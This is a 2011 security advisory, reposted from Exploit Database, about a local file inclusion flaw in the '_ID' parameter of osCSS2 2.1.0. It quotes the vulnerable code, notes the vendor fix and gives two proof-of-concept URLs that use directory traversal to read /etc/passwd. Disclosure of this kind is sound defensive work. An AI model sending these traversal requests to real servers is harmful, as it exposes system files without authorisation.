osCSS2 – ‘_ID’ Local file Inclusion

• Exploit Database
• 15 阅读

• 作者： Stefan Schurtz
  日期： 2011-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18099/

• Advisory:		osCSS2 "_ID" parameter Local file inclusion
  Advisory ID: 	SSCHADV2011-034
  Author:		Stefan Schurtz
  Affected Software:	Successfully tested on osCSS2 2.1.0 (latest version)
  Vendor URL:	http://oscss.org/
  Vendor Status: 	Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
  
  ==========================
  Vulnerability Description
  ==========================
  
  osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability
  
  ==========================
  Vulnerable code
  ==========================
  
  //.htaccess
  RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}
  
  //content.php
  require($page->path_gabarit());
  
  // includes/classes/page.php
  public function pile_file_lang($path_file){
  global $lang;
  if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;
  
  if(!in_array($path_file,(array)$this->PileFileLang))
  include_once($path_file);
  }
  
  ==================
  PoC-Exploit
  ==================
  
  http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
  http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
  
  =========
  Solution
  =========
  
  Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
  
  ====================
  Disclosure Timeline
  ====================
  
  08-Nov-2011 - informed vendor
  08-Nov-2011 – release date of this security advisory
  
  ========
  Credits
  ========
  
  Vulnerability found and advisory written by Stefan Schurtz.
  
  ===========
  References
  ===========
  
  http://oscss.org/
  http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
  http://dev.oscss.org/task/892
  http://www.rul3z.de/advisories/SSCHADV2011-034.txt